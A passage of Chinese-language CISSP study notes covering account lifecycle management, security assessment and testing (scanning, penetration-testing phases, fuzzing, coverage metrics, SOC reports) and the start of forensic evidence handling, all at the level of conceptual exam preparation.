②旁路攻击(side-channel attack) 是非入侵式攻击,并且用于在不利用任何形式的缺陷或弱点的情况下找出与组件运作方式 相关的敏感信息。针对智能卡的差分功率分析(differential power analysis,查看处理过程 中的功率发射)、电磁分析(electromagnetic analysis. 查看发射出的频率)和计时(完成特定 过程所需的时间)都是旁路攻击的示例。 ③微区探查(microprobing) 使用针头和超声振动去除智能卡电路上的外部保护材料,随后就可以通过直接连接智能卡 的 ROM 芯片来访问和操纵其中的数据。 6.拒绝服务攻击 Denial-of-Service Attacks 很普遍了,不解释。 7.网址嫁接 Pharming 是另一种类似的攻击,它将受害者重定向至一个看似合法的、其实仍是伪造的 Web 站点。 四、访问控制的安全防护方法汇总 1.物理上要保护好、隔离好服务器等核心设备。 2.加密、散列、加盐。 3.必须使用强密码。 4.输入时要隐藏密码(用*代替)。 5.必须使用多因素认证登陆。 6.使用帐户锁定技术防止暴力破解。 —170— 7.告知用户最后一次登陆的时间、地点。 8.安全意识培训。 G.管理身份与访问供给生命周期(如供给、审查) 身份信息和访问的开通、使用的生命周期包括:帐户的创建、管理和删除等 ,这些过程 都很重要的,不然会出问题。这里讲账号的管理。 一、提供/开通/指派 Provisioning 一个新用户账户的初始创建通常被称为注册或登记。自己创建账号叫做 register;管理 员创建账号叫做 Provisioning。没什么特别的内容。 二、审查/评审 Review 检查帐户以确保不活跃的账户被禁用以及员工没有过多的特权。要重点防范两个访问控制 方面的问题:特权过度和特权蠕变。当用户拥有超过其工作任务所需的特权时就发生了特权过 度;特权蠕变是指用户账户随工作角色和工作任务的改变而逐渐积累特权(因为不再需要的特 权没有及时取消)。特权蠕变会导致特权过渡。 三、撤销 Revocation 无论员工以何种原因(包括休假)离开公司时,要及时禁用他们的用户账户。如果确定账户 不再使用即可注销。一般情况下,账户禁用 30 天后会自动注销,这依公司需求而定。 —171— 第六域 安全评估与测试(设计、执行与分析安全测试) Chapters 2,15,18 in OSG 7 th No Chapters in AIO 6 th A.设计和验证评估与测试策略 一、基础知识 安全评估过程(程序)有三大主要活动:安全测试、安全评估和安全审计。 1.安全测试 Security Testing(系统功能正常)内测 安全测试能够验证安全防护的控制措施在正常运行,包括自动扫描、工具辅助渗透测试和 手动测试安全性。安全测试应该定期进行,需要关注保护组织机构的每个关键安全控件。 2.安全评估 Security Assessments(综合能力达标)内测 安全评估是对系统、应用程序或其他测试环境的综合评价。在进行安全评估的过程中,受 过培训的信息安全专家会执行风险评估以识别受测环境的漏洞,由此可根据需要做出折衷处理 和提出修复建议。安全评估通常包括使用安全测试工具,但不只是自动扫描和手动渗透测试。 他们还包括彻底审核威胁环境,当前和未来风险以及目标环境的价值。安全性评估的最终成果 产品是一份用于管理的评估报告,这份报告以非技术性的语言描述了评估结果,并且以具体建 议作为结论,从而提高被测环境的安全性。 3.安全审计 Security Audits(安全管控有效)对外 安全审计会使用与安全评估期间相同的许多技术,但必须由独立的审计员执行。评估和测 试结果仅供内部使用,旨在评估控制以求发现需要改进之处。从另一方面来说,审计就是评估, 目的是向第三方展示控制的有效性。为机构设计、实施和监测控制的员工在评估这些控制有效 性时存在固有的利益冲突。审计员对安全控件状态做出的评判应公正、无偏见。他们编写的报 告与安全性评估报告非常类似,但这些报告的阅读对象不同,可能是机构的董事会、政府的监 管人员和其他第三方。审计的类型主要有两种:内部审计和外部审计。 4.漏洞评估/漏洞测试 Vulnerability Assessments 漏洞扫描和渗透测试为安全专家提供的视角是系统或应用技术控制的弱点。从术语角度更 清晰的解释是,漏洞评估其实就是安全性测试工具,而非安全性评估工具。为保持语言的一致 性,它们应该被称为漏洞测试。 二、有关角色 就 3 种角色是比较重要的,搞清楚它们的职能作用就行了。 1.系统工程师和安全专家的角色 系统工程师和安全专家应当与赞助商共同来创建或论证测试和评估战略。他们可能被要要 求提出用来管理风险的测试和评估方法,也可以监控测试和评估过程,如有需要,提出改进建 议。他们也应当论证测试计划和流程。有时,他们会作为测试团队的顾问帮助指定相关的计划 和流程。 2.工作组的角色 一般情况下,企业需要抽组人员建立工作组来执行测试和评估战略。这个工作组常常被称 为测试和评估集成产品小组,由测试和评估领域的专家,客户代表,和其他利益相关方组成。 —172— 3.验证 Verification 与确证 Validation 验证判断产品是否准确体现和满足了产品规范。(满足需求规格书) 确证是指软件或系统可以满足文档的需求和用户期望。(满足实际业务) 关于认证/认可什么的详细描述在第三域 C 章节的第 5 条。 B.执行安全控制测试 1.基于分类的 25 个最危险软件错误 2011 年 CWE/SANS(Common Wiakness Enumeration/SysAdmin,Audit,Network,Security) 发布了 25 个最危险软件错误,即一个最广泛和关键的错误列表,这些错误可能导致严重的软 件漏洞。它们常常很容易被发现和利用。它们之所以危险是因为黑客可以利用它们完全控制软 件或使软件彻底不工作。CBK 里整理了三大高级类型的错误: ①组件之间不安全的交互,Insecure interaction between components(通信弱) ②高风险的资源管理,Risky resource management(管不好) ③漏洞百出的防御,porous defenses(防得差) 2.SANS 协会的关键安全控制 SANS 协会(SysAdmin audit Network Security),又叫系统管理和网络安全审计委员会, 是提供计算机安全培训和专业认证的机构。除了上述 25 个最危险软件错误列表,SANS 关键安 全控制列表是这一领域另一有价值的资源。特别是应用软件安全。其中第 6 号控制列表(CSC6) 是为了管理所有内部开发或外部获取的软件安全生命周期而设计的,用来防止,探测和矫正安 全弱点。具体列表就不复制了,在 CBK 里有。 B.1 脆弱性评估 一、脆弱性评估 目标:评估安全状态、查找全部漏洞、测试响应措施,测试前要告知可能的影响。 分类: ①黑盒测试,零了解,渗透团队在不了解测试目标的情况下测试。 ②灰盒测试,中了解,在了解一些与测试目标相关的信息上测试。 ③白盒测试,全了解,了解目标的本质的基础上测试。 评估内容还包括对员工的职能测试、社会学测试和对设备的物理性测试。评估结果仅针对 当前时间,之后仍需定期评估。 为了做好脆弱性评估,安防人员最好在筹划准备阶段定义好具体的防护目标和要求,包括: ①威胁定义 threat definition; ②目标识别 target identification; ③系统(站点)特点 facility characteristics。 二、漏洞扫描 Vulnerability Scans 自动对系统、应用程序和网络进行探测,寻找可能会被攻击者利用的弱点。漏洞扫描的类 型主要有三种:网络发现扫描、网络漏洞扫描和 Web 应用程序漏洞扫描。 1.网络发现扫描 Network Discovery Scanning —173— 使用多种技术对一系列 IP 地址进行扫描,搜索配有开放网络端口的系统。网络发现扫描 器实际上不能探测系统的漏洞,只是提供一份网络检测的系统显示报告和一份端口清单,这份 清单通过网络和服务器防火墙公开了隐藏在扫描器和扫描系统之间网络路径中的端口。 ①TCP-SYN 扫描。“半开放”扫描,向每个被扫描的端口发送带有 SYN 标志设置的单个 数据包,也就是请求一个新连接。如果扫描器收到了 SYN 和 ACK 标志设置的响应包,则表明 该且端口是开放的,TCP 握手移至第二阶段。 ②TCP 连接扫描。向指定端口的远程系统打开一个全连接。这种扫描的使用情景是,扫描 用户没有运行“半开放”扫描的必要权限。 ③TCP-ACK 扫描。发送带有 ACK 标志设置的单个数据包,表明它是开放连接的一部分。 ④Xmas 扫描。发送带有 FIN 、PSH 和 URG 标志设置的数据包。这个数据包带有很多标志 设置,被称为是“点亮的圣诞树” Christmas tree,从而给这种扫描起了这个名字。 TCP 的三次握手和详细知识看第四域的 A.1 章节。 ⑤扫描神器 NMAP 解释一下 NMAP 扫描结果的三种端口状态: *开放/在用 open:端口在远程系统上是开放的,有一个应用程序正在连接该端口。 *关闭/未用 closed:端口在远程系统上可用,防火墙允许通,但无应用程序连接该端口。 *过滤/阻拦/未知 filtered:无法确定状态,很可能防火墙过滤了。 2.网络漏洞扫描 Network Vulnerability Scanning 网络漏洞扫描在检测到开放端口后会继续调查目标系统或网络,来查找己知的漏洞。在某 些情况下,扫描器可能没有足够的信息来最终确定一个漏洞的存在,它也可能会在没有问题的 时候报告漏洞,这种情况被称为假性正面报告 false positive report(误报)。更危险的是, 漏洞扫描器可能会漏掉漏洞,从而不能提醒管理员危险情况的存在,这个错误被称为假性负面 报告 false negative report(漏报)。 3.Web 漏洞扫描 Web Vulnerability Scanning Web 服务器上的应用程序是复杂的,经常对底层数据库有访问特权。攻击者通常使用 SQL 注入和其他针对 Web 应用程序的安全设计缺陷来攻击。 B.2 渗透测试 渗透测试 PT(Penetration Testing)超越了漏洞测试技术。渗透,就是攻击成功了,入 侵者能够突破系统环境的边界。安全的一个重要目标就是防止渗透。因为它不止是找出漏洞, 更要利用漏洞进行模拟攻击。渗透测试人员通常使用一个工具叫 Metasploit,还有 KALI 也用 得很多。有人把渗透测试等同与安全评估,其实安全评估的范围大得多,不只是网络渗透,还 有物理安全、人员安全、管理安全什么的。 根据双方的关系,分为肓测、双肓测、目标测试。 根据掌握的信息,分为零知识(黑盒)、部分知识(灰盒)、全知识(白盒)。 白盒有 2 种英文:Crystal box(水晶盒)、white box。 黑盒也有另一种说法:realistic type of penetration test(基于现实的测试) 考试里的渗透测试步骤是这样的: —174— ①discovery 发现,搜集和收集目标的相关信息 ②enumeration 枚举,进行端口扫描和资源标识方法 ③vulnerability mapping 脆弱性映射,在确定的系统和资源中标识脆弱性 ④exploitation 利用,尝试利用脆弱性进行未授权访问 ⑤report to manager 向管理层报告,向管理层提交报告和安全建议 (搜、举、射、用、报) 脆弱性评估(测试)与渗透测试的区别: 前者扫描环境中存在的所有可能漏洞;后者找出并利用漏洞入侵客户系统。 选择一个安全测试或渗透测试采用的方法/工具,应考虑以下因素: ①攻击面 Attack Surface。用不同的工具查找不同类型的漏洞。 ②应用类型 Application type。对不同的软件系统用不同的测试方法。 ③测试结果的质量要求和用途 Quality of Results and Usability。不同标准(低误报、 零漏报)、不同用途(如评标、主级等)对应不同的方法。 ④功能特点 Supported Technologies。评测工具有自身的功能特点,有的只管 C 语言, 有的只能搞网站。 ⑤性能要求 Performance and Resource Utilization。不同的工具需要不同的计算能力、 人力、经费等。 考试中经常涉及的渗透测试的工具: ①Nikto/Burp Suite/Wapiti:web 服务、web 应用的漏洞扫描。 ②Metasploit:渗透测试工具集,包括网络扫描、漏洞扫描等,并不针对某一特定功能。 ③sqlmap:SQL 注入测试。 ④Nmap:端口扫描神器。 ⑤Nessus:漏洞扫描。 安全内容自动操作协议 SCAP(The Security Content Automation Protocol),是用来处 理漏洞信息和漏洞管理信息的通信规范,可以传输和保护漏洞信息和安全配置信息(CVE、NVD)。 通用漏洞评级系统 CVSS(Common Vulnerability Scoring System),是用来称量和量化漏 洞的风险等级、影响程度的指标,也包括了消减建议等内容。 NVD(National Vulnerability Database),国家漏洞库。 CVE(Common Vulnerabilities and Exposures),通用公共漏洞库和暴露。 CSV(Comma-Separated Values)不知道是什么。 B.3 日志审查 信息安全管理人员应该定期进行日志审查,以确保特权用户不滥用特权。安全信息和事件 管理(SIEM)系统在这些过程中发挥重要作用,将日志审查的大部分日常工作自动化。 1.日志 日志是系统和网络中发生的事件记录。日志由一些日志项组成,每个日志项包含了与系统 和网络中发生的事件相关的信息。安全日志有很多源头,比如安全软件(反病毒软件,防火墙, —175— 入侵探测和防御系统),工作站和服务器的操作系统,网络设备和应用软件等。 2.日志管理 安全日志管理:生成,传输,存储,分析,和废弃计算机安全日志数据的全过程。 3.日志分析 网络和系统管理员传统上负责执行日志分析——研究日志记录以辨识感兴趣的事件。 4.日志的作用 ①进行审计和取证调查;②内部调查;③建立基线;④识别运行趋势以及发现长期问题。 5.最常见的与安全相关的操作系统数据 ①系统事件:系统事件就是由操作系统组件执行的操作行动,比如关机,启动服务等。一 般来说失败的事件和最重要的成功事件应当被记录,但是大多数操作系统允许管理员指定哪类 事件需要被记录在日志里。每个事件被记录的细节也大相径庭:每个事件一般有时间戳,以及 其他信息,比如事件状态,错误码,服务名和事件有关的用户或系统账号。 ②审计记录:审计记录包含安全事件信息比如成功和失败的身份认证尝试,文件访问,安 全策略变更,账号变更(账号创建,删除,账号权限分配),以及权限的使用。操作系统通常允 许系统管理员指定哪些类型的事件应被审计以及是否记录执行特定活动的成功或失败的尝试 信息。 B.4 综合事务/综合交易/合成交易 synthetic transactions 搞信息系统运行维护的一项重要任务就是监控掌握各类事务(业务)的运行状态,包括人 工检测和自动检测。 1.实际用户监控(RUM)(考点) 实际用户监控(RUM)/真实用户监控,是 Web 监控的一种方式,旨在捕获和分析网站或应用 的每个用户的每个交易。有时也被称为实际用户测量,实际用户度量,或终端用户体验监控 (RUM),是一种被动监控方式,依赖于可以持续观察系统行为,追踪可用性,功能性和反应时 间的 Web 监控服务。人工的性能监控,也被称为被动监控,使用轻量级的、低水平的代理来完 成,如 JavvaScript,CSS,和 AJAX 的调用等。 一些自下而上 bottom-up forms 的实际用户监控(RUM)依赖于捕获服务器侧信息,以重建 用户体验,而自上而下 top-down client side 的基于客户端的实际用户监控(RUM)则可以直接 看到用户如何与应用交互,以及他们的体验究竟如何。(下是服务器) 2.人工合成交易/综合交易的性能监控/综合性能监控/合成性能监控 synthetic transactions 监控真实的用户要追踪实际用户的会话,容易出现躁音(误差);更有效的是使用自动工 具模拟一个脚本化的浏览器进行集成测试,它能精确测量在线时间,获取更多的功能和性能细 节,并提供图形化的态势界面。其实就是一套综合的性能管控系统。综合交易也有翻译成:人 工合成交易的。它不跟踪用户实际的会话。 使用综合交易监控的典型例子是:微软的系统中心运行管理器。使用它你能够创造不同类 型的合成交易,用于监控数据库、网站和 TCP 端口的使用。 监控的方式通常有:①监控 Web 站点;②监控数据库;③监控 TCP 端口。 —176— B.5 代码审核与测试 (例如:手动、 动态、静态、 模糊测试) 第八域 C.3 章节也讲了软件的测试,什么白盒测试(代码)、黑盒测试(功能)、统计测 试、变更测试、单元测试、集成测试、系统测试就不在这讲了,都很容易理解。(这是考点) 软件开发时的安全脆弱性的起因有很多(考点),如: ①不良编程习惯;Bad programming patterns(习惯差) ②安全基础设施的错误配置;Misconfiguration of security infrastructures(配置错) ③安全基础设施的功能缺陷;Functional bugs in security infrastructures(功能弱) ④实施过程中存在逻辑缺陷。Logical flaws in the implemented processes(逻辑乱) 缺陷不是漏洞。 1.代码审查(Code Review) 是软件评估程序的基础。在代码审查(也称为“并行审核”peer review)期间,由不是写 代码的开发人员进行审查、查找缺陷。最正式的代码评审过程,称为范根检查法 Fagan inspections 或 Fagan testing,有六个步骤: ①规划 Planning ②概述 Overview ③准备 Preparation ④检查 Inspection ⑤返工 Rework ⑥后续 Follow-up 2.静态测试 Static Testing 在不运行软件的情况下通过分析源代码或编译的应用程序对软件进行评估。静态分析通常 涉及用来检测常见软件缺陷(如缓冲区溢出)的自动化工具。在成熟的开发环境中,应用程序开 发人员能够使用静态分析工具,并在设计、开发和测试过程中使用它们。 3.动态测试 Dynamic Testing 动态测试是在运行环境中评估软件安全,对于部署别人写的应用程序的组织来说通常是唯 一选择。在这种情况下,测试人员经常不能访问底层的源代码。动态软件测试的一个常见的例 子是使用 Web 应用程序扫描工具来检测 Web 应用程序中跨站点脚本、SQL 注入或其他缺陷的存 在。对生产环境的动态测试应该小心谨慎,以避免服务意外中断。 动态测试也可以使用综合事务/合成交易(synthetic transactions)来验证系统的性能。 4.Fuzzing (模糊测试) Fuzz Testing(考点) 模糊测试是黑盒测试,有点像误用例测试,就是随意乱输入数据来测试软件的功能和性能。 是一项专门的动态测试技术,它向软件提供了许多不同类型的输入,来强调其局限性并发现先 前未被发现的缺陷。模糊测试软件向软件提供无效的输入,或者是随机生成,或者是特别制作 以触发特殊的软件漏洞。然后,模糊测试监控应用程序的性能,监视软件崩溃、缓冲区溢出或 其他不良和/或不可预知的结果。 有两种方法: ①变异(修改),Mutation (Dumb) Fuzzing。修改下实际运行的数据来测试。 —177— ②智能(生成),Generational (Intelligent) Fuzzing。这个难搞,要基于对程序所使 用数据类型的理解,开发新的数据模型并创建新的模糊输入。 模糊测试常用的工具软件是 zzuf! 5.软件测试和代码测试 一旦代码检查成功结束,软件测试就开始了。先从单元级别测试开始,最后做系统级别测 试。有时可能还有一个集成级别的测试。 B.6 误用例测试 在软件测试中有两个主要的测试战略:正面测试和负面测试 ①正面测试/正向测试 Positive Testing,确定你的应用按预期工作,如果在测试中发现 一个错误,则测试失败。 ②负面测试/负向测试 Nagative Testing,确保你的应用能够很好地处理无效输入或非预 期的用户行为。 用例是对于系统及其环境之间交互的抽象场景(程序员都懂)。一个用例定义了系统和环 境可能发生交互时共享的系统或对话的方式。一个场景描述了在特定个人之间的特定交互。用 例把同类系统和使用系统的行动方之间交互的示例性场景加以抽象。 误用例 misuse case,也有称为“滥用用例”,就是人为的做一个错误的行为,去测试软 件的应对能力。软件测试人员使用一个称为误用案例测试或滥用用例测试的过程来评估他们的 软件对这些己知风险的脆弱性。在误用用例测试中,测试人员首先列举己知的误用用例。然后 他们试图使用手动和/或自动攻击技术开发这些用例。 关于详细的测试分类,见第八域 C.3 章节。 B.7 测试覆盖率分析(度量标准) 结构化测试的水平可以使用设计好的度量标准来评估。一般来说使用在结构化测试中软件 结构完成评估的百分比来表示。这些度量标准一般称为“覆盖”,是针对测试选择准则测量其 完成度。结构化覆盖的完成数量应当与软件所面临的风险水平相对应。使用“覆盖”这一术语 通常意味着 1O0%覆盖。比如,如果一个测试程序已经实现“语句覆盖”,这意味着软件中 100% 的语句己经被至少执行了一次。题目中问 statement coverage,别理解错了,它应该翻译成 语句覆盖。 常见的结构化覆盖(structured coverage): ①语句覆盖 statement coverage:这一准则要求每个程序语句至少执行一次测试,并为 此提供充足的测试用例;但是实现语句覆盖不能为软件产品的行为提供充足的信心。 ②决策/判断(分支)覆盖 decision(branch) coverage:这一准则要求每个程序决策或分 支被执行,并为此提供充足的测试用例,以使每个可能的输出至少出现一次。对多数软件产品 来说,这被认为是最低水平的覆盖。但是仅仅是决策覆盖对于高完整性应用来说是不够的。 ③条件覆盖 condition coverage:这一准则要求程序决策的每个条件所呈现的所有可能 的输出必须至少执行一次测试,并为此提供充足的测试用例。只有当必须评估多条件以达到决 策时,条件覆盖才与分支覆盖有所不同。 —178— ④多条件覆盖 multi-condition coverage:这一准则要求在一个程序决策的所有组合条 件执行测试,并为此提供充足的测试用例。 ⑤循环覆盖 loop coverage:这一准则要求所有程序被循环执行,从 0,1,2 以至于多次重 复,覆盖启动,典型运行,和中止(边界)条件。 ⑥路径覆盖 path coverage:这一准则要求每个可能的路径,基础路径等,从程序代码段 的入口到出口,至少执行一次测试,并为此提供充足的测试用例。由于在软件程序中存在大量 可能的路径,路径覆盖一般很难实现。一般根据被测软件的风险大小和关键程度,确定路径覆 盖的数量。 ⑦数据流覆盖 data flow coverage:这一准则要求每个可能的数据流至少执行一次测试, 并为此提供充足的测试用例。目前有一些可用的数据流测试战略。 B.8 接口测试 (例如: API, UI, 物理) 接口测试(Interface Testing)是开发复杂软件系统的一个重要组成部分。被分别开发 的模块之间的数据传递使用定义良好的接口,以便团队可以独立工作;接口测试就是评估模块 接口的性能,以确保所有开发工作完成后模块会正常工作。有三种接口要进行测试: ①应用程序编程接口(API) Application Programming Interfaces 测试模块的数据交互。 ②用户界面(UI) User Interfaces 包括图形用户界面(GUI)graphical user interfaces 和命令行接口(CLI)command-line interfaces,要审查所有的用户界面是否能正常运作。考题会列出一个命令行的测试,答案一 般都是“接口测试”,别错选了 API 测试。 ③物理接口 Physical Interfaces 其它的物理接口。 C.收集安全流程数据(例如: 管理和运营控制措施) 1.信息安全持续监控 Information security continuous monitoring(ISCM)(考点) 用于支持企业的信息安全风险决策;确保安全策略有效实施;保持对信息安全、脆弱性和 威胁的持续了解,为组织的风险管理决策提供支撑。做好监控需要预先定义好各项测量指标 Metrics,如漏洞的数量与严重程度、尝试非法访问的次数、风险容忍的阈值等等。 2.ISCM 开发过程 ①制定 ISCM 战略;Define ②建立 ISCM 程序;establish ③实施 ISCM 程序;implement ④收集安全相关信息;(考题中有的没这步) ⑤分析收集到的信息并形成结果报告;analyze and report ⑥对这些结果作出响应;respond ⑦回顾并更新监控程序。Review and update(考题中有的把这步拆分成 2 步了) 3.度量标准/监控频率 —179— 根据 NIST SP 800-137,对于联邦信息系统和组织的信息安全持续监控(ISCM),安全实践 者需要在确定度量系统的监控频率或安全控制的评估频率时,把下列准则考虑在内: ①安全控制的易变性:易变的安全控制应被更频繁地评估,无论评估目的在于确定安全控 制的有效性还是支持对度量指标的计算。 ②系统分类/影响水平:一般来说,分类为高影响度系统的安全控制要比中、低影响度的 系统上被更频繁地监控。 ③提供关键功能的安全控制或特走评估目标:提供关键功能的安全控制或特定评估目标 (比如日志管理服务器,防火墙)应当更频繁地被监控。另外,支持关键安全功能的个别评估目 标被认为是对系统很关键的(根据业务影响分析)。 ④对于己经辨识的弱点的安全控制:一般认为,已经记录在安全评估报告(SARs)的现存风 险需要更频繁地监控以确保风险在可容忍范围内。 ⑤组织风险容忍水平:对风险容忍水平低的组织(比如处理,存储,或传输大量专有和/ 或个人身份识别信息的组织,有大量高等级系统的组织,面临特定持续性威胁的组织〕会比对 风险容忍水平高的组织(比如拥有大量中低等级的系统,基本不处理,存储或传输专有的/或个 人身份识别信息的组织)更频繁地监控安全态势。 ⑥威胁信息:组织要考虑现有可信的威胁信息,包括己知的漏洞,攻击场景。 ⑦薄弱点信息:在决定监控频率时,组织要考虑与信息技术产品相关的最新薄弱点信息。 比如,如果一个特定产品厂商每月提供软件补丁,组织就可以考虑至少每月一次执行漏洞扫描。 ⑧风险评估结果:检查组织的、或系统的风险评估结果,并在决定监控频率时考虑这些结 果的影响。如果在组织内部有风险打分系统,风险的分值可能被用来证明增加或减少对相关控 制的监控频率的合理性。 ⑨报告要求:报告要求不会驱动 ISCM 战略,但是可能对监控频率产生影响。比如如果组 织策略要求每个季度报告非授权组件数量和采取的纠正性行动,组织将至少每季度监控系统以 发现非授权组件。 C.1 账户管理 (例如:升级、撤销) 在第五域的 G 章节也讲到身份信息的管理了,即身份信息和访问的开通、使用的生命周期 包括:帐户的创建、管理和删除等,这些过程都很重要的,不然会出问题。它和账户管理还是 有区别的。 1.身份信息管理 ①提供/开通/指派 Provisioning:一个新用户账户的初始创建,称为注册或登记。 ②审查/评审 Review:检查帐户以确保不活跃的账户被禁用以及员工没有过多的特权。 ③撤销 Revocation:无论员工以何种原因离开公司,要及时禁用他们的用户账户。 2.账户管理 ①增加账户。首先用户要悉知并接受系统使用政策,然后还有账号期限、口令强度等要求。 ②修改账户。特权账号要严控,尽量少用、不用,别滥用。 ③停用账户。人走茶凉。 —180— C.2 管理评审 management reviews 管理评审是对管理进行评审,公司高管召开会议来研究管理机制是是否完全达到公司要 求、符合公司目标。 C.3 关键绩效与风险指标 这是两个最重要的信息安全度量标准,即 KPIs(key performance indicators)和 KRIs (key risk Indicators),关键性能指标和关键风险指标。ISO 27004 给出了衡量安全管控效 能的标准。 KPI 是评估所有关键业务功能是否有效运行的指标,即系统运维关注的运行质量状况; KRI 是展现某些特殊操作是否带来安全风险的指标,即安全监察关注的所有风险变化。 C.4 验证备份数据 数据必须有效备份,并能按需恢复。用户数据、数据库、邮件等要用不同级别的备份策略。 C.5 培训与意识 培训是提高技能,意识是提高警惕。社会工程通过搞定人的因素而轻易得到相关信息或资 产,典型的社会工程应用方式就是钓鱼(phishing),其中精确指向的钓鱼(spear phishing) 专门针对高官、高管人群,也称为捕鲸(whaling)。此外,借口套话(pretexting)方式常 用来骗取对方的账号信息。 C.6 灾难恢复与业务连续性 业务持续计划(BCP)以及灾难恢复计划(DRP)应定期评测并修订。 第一域 G 章节,第七域 M、N 章节都讲了 BCP,都要掌握。 D.分析与报告测试结果(例如:自动、手动) 写报告是最烦人的事,也是最需要综合素质的事,工作量很大,在熟悉技术方案、掌握测 试情况的基础上,必须按照管理层的需求,以商业运营的角度去客观、生动、浅易地描述安全 状况。技术报告不是对扫描结果的简单罗列,要从分析模型方法、分析测试结果、量化风险影 响、提出对策措施、核算成本收益等多个方面进行研究,最终给出精准可行的报告,为管理层 提供辅助决策支持。 E.开展或促进内部和第三方审计 美国联邦信息安全法案(FISMA Federal Information Security Management Act)要求 联邦机构每年至少对组织的信息安全体系进行一次自我审计和独立的第三方审计。信息安全专 家需要理解法律标准,虽然完全做到很难,但必须确保有恰当的范围和合理的目标用于相应的 安全级别,并实施合理的控制。 内部审计与外部审计各自有优缺点:内部审计的人员对公司情况更熟悉,协调公司内部资 源更顺畅,且对外暴露公司资产的风险较小,但也存在内部关系复杂,人为隐蔽、瞒报问题的 —181— 情况。外部审计往往有更多其它系统安全测试的经验,且由于不了解公司、不受利益制约,可 以更客观更彻底的随意查找并暴露问题,但耗时较长,外部审计的收费还很昂贵,且必须受监 管以避免内部信息泄露。 1.有关审计标准的陈述(SAS)70 历史上,许多组织常借鉴 Statement on Auditing Standards (SAS) 70 reports 审计准 则来有效管控外包服务,然而 SAS 70 关注财务报告内部控制(ICOFR)specifically on risks related to internal control over financial reporting,并不关注系统可用性和安全。SAS 70 报告已在 2011 退休,取代财务报告内部控制(ICOFR)的是:服务组织控制报告 SOC(Service Organization Control)报告。在过去,SAS 70 报告的目的是辅助做财务报表审计。现在三个 类型的 SOC 报告己经被定义以取代 SAS 70 报告并解决更广泛的特定用户需求一比如解决安全, 隐私,和可用性问题。另外,服务组织正在寻找更好的方式以提供对于它们控制环境的保障。 2.SOC 报告类型(Service Organization Control(SOC) reports)(必考) 服务组织控制报告/SOC 报告,通常覆盖过去 12 个月有关设计和控制有效性的活动,每年 都要持续报告以满足财务管理或安全治理要求。在有些场合,一个 SOC 报告也可能覆盖一个较 短的时间段,比如六个月,或特定时间点,一般用于新系统/服务的控制设计或者对于系统/ 服务的最初检查(审计)。(SOC 共有 3 种 2 类) ①SOC1 报告:仅关于财务的审计报告。 ②SOC2 报告:详细的专业的安全服务审计报告(可用、机密、完整性,隐私什么的)。 ③SOC3 报告:简要的公开的安全服务审计报告(可用、机密、完整性,隐私什么的)。 一类/Ⅰ类报告:提供针对某个时间点的审计报告。(Ⅰ是点,Ⅱ是段) 二类/Ⅱ类报告:提供针对一个时间段的审计报告。(新系统、新服务什么的) 比如,如果一个组织需要覆盖特定系统的安全与可用性的时间段报告,组织将要求服务提 供商给予 SOC 2 的Ⅱ类安全与可用性报告。如果组织需要覆盖财务报告内部控制(ICOFR)的时 间点报告,组织将要求服务提供商给予 SOC 1 的Ⅰ类报告。 SOC2 要求每 6 个月发布 1 次。审计的流程、阶段都很简单,不说了。 3.SSAE-16 从 2011 年 6 月开始,SSAE 16 正式替代了 SAS 70。即指美国注册会计师协会(AICPA)制 定的-鉴证业务准则公告第 16 号(Statements on Standards for Attestation Engagements No.16,简称 SSAE 16)。这一准则要求企业遵循 ISAE 3402《鉴证业务国际准则第 3402 号》 (International Standards for Assurance Engagements ISAE-No.3402)中规定的国际服务 组织报告准则。SSAE 16 认证和 ISAE 3402 合规都要求一名独立审计师对服务组织的内部控制 进行严格审查。 —182— 第七域 安全运营(例如:基础概念、调查、事件管理、灾难恢复) Chapters 3,10,16,17,18,19 in OSG 7 th Chapters 5,8,9,11 in AIO 6 th A.理解与支持调理/知道什么是调查取证 信息安全是直接关系到公司资产和利益的事,美国是法治社会,所以讲运营一上来就先搞 法律法规的东西,就是组织必须实施和证明其合法、合规、合道德,并利用法律指控坏人。为 了搞到证据或者得到日志告警什么的,就有一系列的针对攻击的安全方面的运营工作要做了。 A.1 证据采集与处理 (例如: 监管链、 访谈) 罗卡交换定律(Locard’s Exchange Principle)指出,在犯罪现场中,罪犯拿走了多少 东西,那么就会相应的留下多少东西。这一原则同样适用于纯数字的犯罪现场,使我们能够找 出相关的责任人。 计算机犯罪类似于传统的犯罪,必须理解 MOM——动机、机会和手段(Motive,Oportunity, And Means),计算机犯罪也具有特定的惯用手法(Modus Operandi, MO [method of operation])。 了解罪犯的 MO 与签名行为对整个调查过程都十分有用,可以用来识别相同罪犯的其他攻击, 也可以提供在会谈、讯问和审判过程中非常有用的信息,还可以引导控制心理犯罪情景分析(定 形)。定形提供了对攻击者思考过程的洞察,并且可以用于标识攻击者。 数据调查有很多不同的名字:计算机取证(computer forensics)、数字取证(digital forensics )和网络取证(network forensics)到电子数据发现(electronic data discovery)、 电脑网络取证(cyber forensics)和取证计算(forensics computer)等等。 1.现行法律主要针对 3 种类型的计算机犯罪(cyber law): 计算机辅助犯罪(computer-assistedcrime)是指用计算机作为工具来帮助实施传统犯罪。 针对计算机的犯罪(computer-targeted crime)是指计算机系统成为被攻击的受害者。 计算机牵涉型攻击(computer is incidental)是指计算机不一定是攻击者或被攻击者,只 是在攻击发生时碰巧涉及其中。 通常,许多受到伤害的公司只希望确保攻击者利用的脆弱性得到修复,而不愿花时间和金 钱来追捕与起诉攻击者,这是使得网络罪犯逍遥法外的主要原因。 2.可接纳的证据 Admissible Evidence CBK 里的描述是,证据必须满足 5 个条件(五项证据规则)(真、准、全、信服、接): ①真实 be authentic。证据必须是来源于真实场景、并符合当时的真实场景。 ②准确 be accurate。收集、使用过程必须保持证据的准确、无误。 ③全面/完全 be complete。所有相关的证据都要收集,确保其全面、可靠、无遗漏。 ④有说服力 be convincing。证据应该清楚、明晰和容易理解,对陪审团来说是可信的。 ⑤可被接纳 be admissible。证据必须合规,能够在法庭上使用,能够证明重要事实。For evidence to be admissible, it must be relevant, complete, sufficient, and reliable to the case.这最后一条 admissible,在官方学习指南(OSG)里的描述是,在法庭上采纳的 —183— 证据必须满足 3 个基本要求(想必发): 1)相关性。证据必须能证明某个确定事实。 2)必要性。证据必须对本案是必要的,起关键作用的。 3)合法性。证据必须合法获得。 3.证据链/监管链/保管链 Chain of Evidence 在法庭上,仅通过证人来证明某物品的归属是不严谨、不可靠的。还必须建立证据链(chain of evidence),也被称为证据保管链或监管链(chain of custody),包括所有处理证据的 人,包括收集的警员、处理的技术人员以及律师等等,证据必须有全寿命的完整记录,以确保 是同一证据,处理证据的每个人都必须签署监管日志链(证据履历表),以提供完整的事件序 列,从而说明从证据收集开始到审问之间的过程。 4.证据的类型 Types of Evidence 